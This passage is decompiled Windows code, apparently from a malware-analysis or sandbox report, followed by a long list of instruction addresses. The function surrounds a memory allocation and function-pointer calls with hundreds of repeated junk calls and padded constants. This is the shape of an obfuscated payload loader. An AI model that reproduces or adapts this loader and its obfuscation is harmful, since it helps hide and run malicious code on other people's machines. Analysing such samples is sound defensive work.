0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8);
						if(__eflags == 0) {
							goto L4;
						}
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						NtAllocateVirtualMemory(_v72(0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8),  &_v12, 0,  &_v20,  *0x4560d4,  *0x4560d8);
						_v44(_v12, _a4, _a8);
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						E00402141(_t1011, E00401D2E(__eflags));
						_t999 = _v40(_v24, 0, 1, 0, _v12,  &_a8, _a8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8, 0x45a978, 0x4326f8);
						asm("sbb eax, eax");
						_t492 =  ~_t999 & _v12;
						__eflags = _t492;
						L8:
						return _t492;
					}
					L4:
					_t492 = 0;
					goto L8;
				}
				_push(8);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t1009() != 0) {
					goto L3;
				}
				_t1004 =  *_t1009( &_v8, 0, 0, 1, 0xf0000000);
				_t1102 = _t1004;
				if(_t1004 != 0) {
					goto L3;
				}
				return _t1004;
			}






























                                                                              0x0040216c
                                                                              0x0040216f
                                                                              0x00402172
                                                                              0x00402177
                                                                              0x0040217a
                                                                              0x00402181
                                                                              0x0040218b
                                                                              0x00402198
                                                                              0x0040219b
                                                                              0x004021a5
                                                                              0x004021a7
                                                                              0x004021b1
                                                                              0x004021b4
                                                                              0x004021be
                                                                              0x004021c1
                                                                              0x004021cb
                                                                              0x004021ce
                                                                              0x004021da
                                                                              0x004021e2
                                                                              0x004021e6
                                                                              0x0040220f
                                                                              0x00402215
                                                                              0x0040221b
                                                                              0x00402222
                                                                              0x00402227
                                                                              0x00402228
                                                                              0x0040222f
                                                                              0x00402234
                                                                              0x00402235
                                                                              0x0040223c
                                                                              0x00402241
                                                                              0x00402242
                                                                              0x00402249
                                                                              0x0040224e
                                                                              0x0040224f
                                                                              0x00402256
                                                                              0x0040225b
                                                                              0x0040225c
                                                                              0x00402266
                                                                              0x0040226b
                                                                              0x0040226c
                                                                              0x00402273
                                                                              0x00402278
                                                                              0x00402279
                                                                              0x00402280
                                                                              0x00402285
                                                                              0x00402286
                                                                              0x0040228d
                                                                              0x00402292
                                                                              0x00402293
                                                                              0x0040229a
                                                                              0x0040229f
                                                                              0x004022a0
                                                                              0x004022a7
                                                                              0x004022af
                                                                              0x004022b0
                                                                              0x004022b7
                                                                              0x004022bc
                                                                              0x004022bd
                                                                              0x004022c4
                                                                              0x004022c9
                                                                              0x004022ca
                                                                              0x004022d1
                                                                              0x004022d6
                                                                              0x004022d7
                                                                              0x004022de
                                                                              0x004022e3
                                                                              0x004022e4
                                                                              0x004022eb
                                                                              0x004022f0
                                                                              0x004022f1
                                                                              0x004022fb
                                                                              0x00402300
                                                                              0x00402301
                                                                              0x00402308
                                                                              0x0040230d
                                                                              0x0040230e
                                                                              0x00402315
                                                                              0x0040231a
                                                                              0x0040231b
                                                                              0x00402322
                                                                              0x00402327
                                                                              0x00402328
                                                                              0x0040232f
                                                                              0x00402334
                                                                              0x00402335
                                                                              0x0040233c
                                                                              0x00402344
                                                                              0x00402345
                                                                              0x0040234c
                                                                              0x00402351
                                                                              0x00402352
                                                                              0x00402359
                                                                              0x0040235e
                                                                              0x0040235f
                                                                              0x00402366
                                                                              0x0040236b
                                                                              0x0040236c
                                                                              0x00402373
                                                                              0x00402378
                                                                              0x00402379
                                                                              0x00402380
                                                                              0x00402385
                                                                              0x00402386
                                                                              0x00402390
                                                                              0x00402395
                                                                              0x00402396
                                                                              0x0040239d
                                                                              0x004023a2
                                                                              0x004023a3
                                                                              0x004023aa
                                                                              0x004023af
                                                                              0x004023b0
                                                                              0x004023b7
                                                                              0x004023bc
                                                                              0x004023bd
                                                                              0x004023c4
                                                                              0x004023c9
                                                                              0x004023ca
                                                                              0x004023d1
                                                                              0x004023d9
                                                                              0x004023da
                                                                              0x004023e1
                                                                              0x004023e6
                                                                              0x004023e7
                                                                              0x004023ee
                                                                              0x004023f3
                                                                              0x004023f4
                                                                              0x004023fb
                                                                              0x00402400
                                                                              0x00402401
                                                                              0x00402408
                                                                              0x0040240d
                                                                              0x0040240e
                                                                              0x00402415
                                                                              0x0040241a
                                                                              0x0040241b
                                                                              0x00402425
                                                                              0x0040242a
                                                                              0x0040242b
                                                                              0x00402432
                                                                              0x00402437
                                                                              0x00402438
                                                                              0x0040243f
                                                                              0x00402444
                                                                              0x00402445
                                                                              0x0040244c
                                                                              0x00402451
                                                                              0x00402452
                                                                              0x00402459
                                                                              0x0040245e
                                                                              0x0040245f
                                                                              0x00402466
                                                                              0x0040246e
                                                                              0x0040246f
                                                                              0x00402476
                                                                              0x0040247b
                                                                              0x0040247c
                                                                              0x00402483
                                                                              0x00402488
                                                                              0x00402489
                                                                              0x00402490
                                                                              0x00402495
                                                                              0x00402496
                                                                              0x0040249d
                                                                              0x004024a2
                                                                              0x004024a3
                                                                              0x004024aa
                                                                              0x004024af
                                                                              0x004024b0
                                                                              0x004024ba
                                                                              0x004024bf
                                                                              0x004024c0
                                                                              0x004024c7
                                                                              0x004024cc
                                                                              0x004024cd
                                                                              0x004024d4
                                                                              0x004024d9
                                                                              0x004024da
                                                                              0x004024e1
                                                                              0x004024e6
                                                                              0x004024e7
                                                                              0x004024ee
                                                                              0x004024f3
                                                                              0x004024f4
                                                                              0x004024fb
                                                                              0x00402503
                                                                              0x00402504
                                                                              0x0040250b
                                                                              0x00402510
                                                                              0x00402511
                                                                              0x00402518
                                                                              0x0040251d
                                                                              0x0040251e
                                                                              0x00402525
                                                                              0x0040252a
                                                                              0x0040252b
                                                                              0x00402532
                                                                              0x00402537
                                                                              0x00402538
                                                                              0x0040253f
                                                                              0x00402544
                                                                              0x00402545
                                                                              0x0040254f
                                                                              0x00402554
                                                                              0x00402555
                                                                              0x0040255c
                                                                              0x00402561
                                                                              0x00402562
                                                                              0x00402569
                                                                              0x0040256e
                                                                              0x0040256f
                                                                              0x00402576
                                                                              0x0040257b
                                                                              0x0040257c
                                                                              0x00402583
                                                                              0x00402588
                                                                              0x00402589
                                                                              0x00402590
                                                                              0x00402598
                                                                              0x00402599
                                                                              0x004025a0
                                                                              0x004025a5
                                                                              0x004025a6
                                                                              0x004025ad
                                                                              0x004025b2
                                                                              0x004025b3
                                                                              0x004025ba
                                                                              0x004025bf
                                                                              0x004025c0
                                                                              0x004025c7
                                                                              0x004025cc
                                                                              0x004025cd
                                                                              0x004025d4
                                                                              0x004025d9
                                                                              0x004025da
                                                                              0x004025e4
                                                                              0x004025e9
                                                                              0x004025ea
                                                                              0x004025f1
                                                                              0x004025f6
                                                                              0x004025f7
                                                                              0x004025fe
                                                                              0x00402603
                                                                              0x00402604
                                                                              0x0040260b
                                                                              0x00402610
                                                                              0x00402611
                                                                              0x00402618
                                                                              0x0040261d
                                                                              0x0040261e
                                                                              0x00402625
                                                                              0x0040262d
                                                                              0x0040262e
                                                                              0x00402635
                                                                              0x0040263a
                                                                              0x0040263b
                                                                              0x00402642
                                                                              0x00402647
                                                                              0x00402648
                                                                              0x0040264f
                                                                              0x00402654
                                                                              0x00402655
                                                                              0x0040265c
                                                                              0x00402661
                                                                              0x00402662
                                                                              0x00402669
                                                                              0x0040266e
                                                                              0x0040266f
                                                                              0x00402679
                                                                              0x0040267e
                                                                              0x0040267f
                                                                              0x00402686
                                                                              0x0040268b
                                                                              0x0040268c
                                                                              0x00402693
                                                                              0x00402698
                                                                              0x00402699
                                                                              0x004026a0
                                                                              0x004026a5
                                                                              0x004026a6
                                                                              0x004026ad
                                                                              0x004026b2
                                                                              0x004026b3
                                                                              0x004026ba
                                                                              0x004026c2
                                                                              0x004026c3
                                                                              0x004026ca
                                                                              0x004026cf
                                                                              0x004026d0
                                                                              0x004026d7
                                                                              0x004026dc
                                                                              0x004026dd
                                                                              0x004026e4
                                                                              0x004026e9
                                                                              0x004026ea
                                                                              0x004026f1
                                                                              0x004026f6
                                                                              0x004026f7
                                                                              0x004026fe
                                                                              0x00402703
                                                                              0x00402704
                                                                              0x0040270e
                                                                              0x00402713
                                                                              0x00402714
                                                                              0x0040271b
                                                                              0x00402720
                                                                              0x00402721
                                                                              0x00402728
                                                                              0x0040272d
                                                                              0x0040272e
                                                                              0x00402735
                                                                              0x0040273a
                                                                              0x0040273b
                                                                              0x00402742
                                                                              0x00402747
                                                                              0x00402748
                                                                              0x0040274f
                                                                              0x00402757
                                                                              0x00402758
                                                                              0x0040275f
                                                                              0x00402764
                                                                              0x00402765
                                                                              0x0040276c
                                                                              0x00402771
                                                                              0x00402772
                                                                              0x00402779
                                                                              0x0040277e
                                                                              0x0040277f
                                                                              0x00402786
                                                                              0x0040278b
                                                                              0x0040278c
                                                                              0x00402793
                                                                              0x00402798
                                                                              0x00402799
                                                                              0x004027a3
                                                                              0x004027a8
                                                                              0x004027a9
                                                                              0x004027b0
                                                                              0x004027b5
                                                                              0x004027b6
                                                                              0x004027bd
                                                                              0x004027c2
                                                                              0x004027c3
                                                                              0x004027ca
                                                                              0x004027cf
                                                                              0x004027d0
                                                                              0x004027d7
                                                                              0x004027dc
                                                                              0x004027dd
                                                                              0x004027e4
                                                                              0x004027ef
                                                                              0x004027f0
                                                                              0x004027f1
                                                                              0x004027f2
                                                                              0x004027f7
                                                                              0x004027ff
                                                                              0x00402810
                                                                              0x0040281d
                                                                              0x0040282a
                                                                              0x00402837
                                                                              0x00402844
                                                                              0x00402854
                                                                              0x00402861
                                                                              0x0040286e
                                                                              0x0040287b
                                                                              0x00402888
                                                                              0x00402895
                                                                              0x004028a5
                                                                              0x004028b2
                                                                              0x004028bf
                                                                              0x004028cc
                                                                              0x004028d9
                                                                              0x004028e9
                                                                              0x004028f6
                                                                              0x00402903
                                                                              0x00402910
                                                                              0x0040291d
                                                                              0x0040292a
                                                                              0x0040293a
                                                                              0x00402947
                                                                              0x00402954
                                                                              0x00402961
                                                                              0x0040296e
                                                                              0x0040297e
                                                                              0x0040298b
                                                                              0x00402998
                                                                              0x004029a5
                                                                              0x004029b2
                                                                              0x004029bf
                                                                              0x004029cf
                                                                              0x004029dc
                                                                              0x004029e9
                                                                              0x004029f6
                                                                              0x00402a03
                                                                              0x00402a13
                                                                              0x00402a20
                                                                              0x00402a2d
                                                                              0x00402a3a
                                                                              0x00402a47
                                                                              0x00402a54
                                                                              0x00402a64
                                                                              0x00402a71
                                                                              0x00402a7e
                                                                              0x00402a8b
                                                                              0x00402a98
                                                                              0x00402aa8
                                                                              0x00402ab5
                                                                              0x00402ac2
                                                                              0x00402acf
                                                                              0x00402adc
                                                                              0x00402ae9
                                                                              0x00402af9
                                                                              0x00402b06
                                                                              0x00402b13
                                                                              0x00402b20
                                                                              0x00402b2d
                                                                              0x00402b3d
                                                                              0x00402b4a
                                                                              0x00402b57
                                                                              0x00402b64
                                                                              0x00402b71
                                                                              0x00402b7e
                                                                              0x00402b8e
                                                                              0x00402b9b
                                                                              0x00402ba8
                                                                              0x00402bb5
                                                                              0x00402bc2
                                                                              0x00402bd2
                                                                              0x00402bdf
                                                                              0x00402bec
                                                                              0x00402bf9
                                                                              0x00402c06
                                                                              0x00402c13
                                                                              0x00402c23
                                                                              0x00402c30
                                                                              0x00402c3d
                                                                              0x00402c4a
                                                                              0x00402c57
                                                                              0x00402c67
                                                                              0x00402c74
                                                                              0x00402c81
                                                                              0x00402c8e
                                                                              0x00402c9b
                                                                              0x00402ca8
                                                                              0x00402cb8
                                                                              0x00402cc5
                                                                              0x00402cd2
                                                                              0x00402cdf
                                                                              0x00402cec
                                                                              0x00402cfc
                                                                              0x00402d09
                                                                              0x00402d16
                                                                              0x00402d23
                                                                              0x00402d30
                                                                              0x00402d3d
                                                                              0x00402d4d
                                                                              0x00402d5a
                                                                              0x00402d67
                                                                              0x00402d74
                                                                              0x00402d81
                                                                              0x00402d91
                                                                              0x00402d9e
                                                                              0x00402dab
                                                                              0x00402db8
                                                                              0x00402dc5
                                                                              0x00402dd2
                                                                              0x00402de7
                                                                              0x00402de9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00402df7
                                                                              0x00402e04
                                                                              0x00402e11
                                                                              0x00402e1e
                                                                              0x00402e2b
                                                                              0x00402e3b
                                                                              0x00402e48
                                                                              0x00402e55
                                                                              0x00402e62
                                                                              0x00402e6f
                                                                              0x00402e7c
                                                                              0x00402e8c
                                                                              0x00402e99
                                                                              0x00402ea6
                                                                              0x00402eb3
                                                                              0x00402ec0
                                                                              0x00402ed0
                                                                              0x00402edd
                                                                              0x00402eea
                                                                              0x00402ef7
                                                                              0x00402f04
                                                                              0x00402f11
                                                                              0x00402f21
                                                                              0x00402f2e
                                                                              0x00402f3b
                                                                              0x00402f48
                                                                              0x00402f55
                                                                              0x00402f65
                                                                              0x00402f72
                                                                              0x00402f7f
                                                                              0x00402f8c
                                                                              0x00402f99
                                                                              0x00402fa6
                                                                              0x00402fb6
                                                                              0x00402fc3
                                                                              0x00402fd0
                                                                              0x00402fdd
                                                                              0x00402fea
                                                                              0x00402ffa
                                                                              0x00403007
                                                                              0x00403014
                                                                              0x00403021
                                                                              0x0040302e
                                                                              0x0040303b
                                                                              0x0040304b
                                                                              0x00403058
                                                                              0x00403065
                                                                              0x00403072
                                                                              0x0040307f
                                                                              0x0040308f
                                                                              0x0040309c
                                                                              0x004030a9
                                                                              0x004030b6
                                                                              0x004030c3
                                                                              0x004030d0
                                                                              0x004030e0
                                                                              0x004030ed
                                                                              0x004030fa
                                                                              0x00403107
                                                                              0x00403114
                                                                              0x00403124
                                                                              0x00403131
                                                                              0x0040313e
                                                                              0x0040314b
                                                                              0x00403158
                                                                              0x00403165
                                                                              0x00403175
                                                                              0x00403182
                                                                              0x0040318f
                                                                              0x0040319c
                                                                              0x004031a9
                                                                              0x004031b9
                                                                              0x004031c6
                                                                              0x004031d3
                                                                              0x004031e0
                                                                              0x004031ed
                                                                              0x004031fa
                                                                              0x0040320a
                                                                              0x00403217
                                                                              0x00403224
                                                                              0x00403231
                                                                              0x0040323e
                                                                              0x0040324e
                                                                              0x0040325b
                                                                              0x00403268
                                                                              0x00403275
                                                                              0x00403282
                                                                              0x0040328f
                                                                              0x0040329f
                                                                              0x004032ac
                                                                              0x004032b9
                                                                              0x004032c6
                                                                              0x004032d3
                                                                              0x004032e3
                                                                              0x004032f0
                                                                              0x004032fd
                                                                              0x0040330a
                                                                              0x00403317
                                                                              0x00403324
                                                                              0x00403334
                                                                              0x00403341
                                                                              0x0040334e
                                                                              0x0040335b
                                                                              0x00403368
                                                                              0x00403378
                                                                              0x00403385
                                                                              0x00403392
                                                                              0x0040339f
                                                                              0x004033ac
                                                                              0x004033b9
                                                                              0x004033d6
                                                                              0x004033d8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004033e6
                                                                              0x004033f3
                                                                              0x00403400
                                                                              0x0040340d
                                                                              0x0040341a
                                                                              0x0040342a
                                                                              0x00403437
                                                                              0x00403444
                                                                              0x00403451
                                                                              0x0040345e
                                                                              0x0040346b
                                                                              0x0040347b
                                                                              0x00403488
                                                                              0x00403495
                                                                              0x004034a2
                                                                              0x004034af
                                                                              0x004034bf
                                                                              0x004034cc
                                                                              0x004034d9
                                                                              0x004034e6
                                                                              0x004034f3
                                                                              0x00403500
                                                                              0x00403510
                                                                              0x0040351d
                                                                              0x0040352a
                                                                              0x00403537
                                                                              0x00403544
                                                                              0x00403554
                                                                              0x00403561
                                                                              0x0040356e
                                                                              0x0040357b
                                                                              0x00403588
                                                                              0x00403595
                                                                              0x004035a5
                                                                              0x004035b2
                                                                              0x004035bf
                                                                              0x004035cc
                                                                              0x004035d9
                                                                              0x004035e9
                                                                              0x004035f6
                                                                              0x00403603
                                                                              0x00403610
                                                                              0x0040361d
                                                                              0x0040362a
                                                                              0x0040363a
                                                                              0x00403647
                                                                              0x00403654
                                                                              0x00403661
                                                                              0x0040366e
                                                                              0x0040367e
                                                                              0x0040368b
                                                                              0x00403698
                                                                              0x004036a5
                                                                              0x004036b2
                                                                              0x004036bf
                                                                              0x004036cf
                                                                              0x004036dc
                                                                              0x004036e9
                                                                              0x004036f6
                                                                              0x00403703
                                                                              0x00403713
                                                                              0x00403720
                                                                              0x0040372d
                                                                              0x0040373a
                                                                              0x00403747
                                                                              0x00403754
                                                                              0x00403764
                                                                              0x00403771
                                                                              0x0040377e
                                                                              0x0040378b
                                                                              0x00403798
                                                                              0x004037a8
                                                                              0x004037b5
                                                                              0x004037c2
                                                                              0x004037cf
                                                                              0x004037dc
                                                                              0x004037e9
                                                                              0x004037f9
                                                                              0x00403806
                                                                              0x00403813
                                                                              0x00403820
                                                                              0x0040382d
                                                                              0x0040383d
                                                                              0x0040384a
                                                                              0x00403857
                                                                              0x00403864
                                                                              0x00403871
                                                                              0x0040387e
                                                                              0x0040388e
                                                                              0x0040389b
                                                                              0x004038a8
                                                                              0x004038b5
                                                                              0x004038c2
                                                                              0x004038d2
                                                                              0x004038df
                                                                              0x004038ec
                                                                              0x004038f9
                                                                              0x00403906
                                                                              0x00403913
                                                                              0x00403923
                                                                              0x00403930
                                                                              0x0040393d
                                                                              0x0040394a
                                                                              0x00403957
                                                                              0x00403967
                                                                              0x00403974
                                                                              0x00403981
                                                                              0x0040398e
                                                                              0x0040399b
                                                                              0x004039a8
                                                                              0x004039c9
                                                                              0x004039d5
                                                                              0x004039e0
                                                                              0x004039ed
                                                                              0x004039fa
                                                                              0x00403a07
                                                                              0x00403a17
                                                                              0x00403a24
                                                                              0x00403a31
                                                                              0x00403a3e
                                                                              0x00403a4b
